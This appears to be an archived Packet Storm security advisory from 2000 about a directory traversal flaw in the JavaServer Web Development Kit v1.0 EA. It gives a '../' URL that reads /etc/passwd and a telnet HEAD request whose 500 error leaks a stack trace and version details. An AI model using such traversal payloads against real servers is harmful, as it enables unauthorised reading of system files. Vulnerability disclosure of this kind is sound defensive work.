WDK_v1.0.vuln.txt

2000-08-29T00:00:00
ID PACKETSTORM:22900
Type packetstorm
Reporter Kevin Finisterre
Modified 2000-08-29T00:00:00

Description

                                        
                                            `../ bugs in the Java Web server Development kit built in servlet engine  
  
http://localhost:8080/../../../../etc/passwd  
  
below is my version info.  
  
JavaServer(tm) WDK v1.0 EA  
  
[elguapo@localhost elguapo]$ telnet localhost 8080  
Trying 127.0.0.1...  
Connected to localhost.localdomain.  
Escape character is '^]'.  
HEAD / HTTP/1.0  
  
HTTP/1.0 500 Internal Server Error  
Date: Fri, 25 Aug 2000 14:24:54 GMT  
Server: JavaServer Web Dev Kit/1.0 EA with JSP/1.0 and Servlet/2.1  
Content-Type: text/html  
Servlet-Engine: JavaServer Web Dev Kit/1.0 EA (JSP 1.0; Servlet 2.1;  
Java 1.3.0beta_refresh; Linux 2.2.15-4mdk i386; java.vendor=Sun  
Microsystems Inc.)  
  
<h1>Error: 500</h1>  
<b>Internal Servlet Error:</b><br>  
<pre>  
java.lang.ClassCastException: javax.servlet.http.NoBodyResponse  
at  
com.sun.web.core.RequestDispatcherImpl.forward(RequestDispatcherImpl.java:62)  
at com.sun.web.core.DefaultServlet.processFile(DefaultServlet.java:126)  
at com.sun.web.core.DefaultServlet.doGet(DefaultServlet.java:69)  
  
at javax.servlet.http.HttpServlet.doHead(HttpServlet.java:286)  
at javax.servlet.http.HttpServlet.service(HttpServlet.java:744)  
at javax.servlet.http.HttpServlet.service(HttpServlet.java:840)  
at  
com.sun.web.core.ServletWrapper.handleRequest(ServletWrapper.java:155)  
at com.sun.web.core.Context.handleRequest(Context.java:414)  
at  
com.sun.web.server.ConnectionHandler.run(ConnectionHandler.java:139)  
</pre>  
  
Connection closed by foreign host.  
[elguapo@localhost elguapo]$  
  
`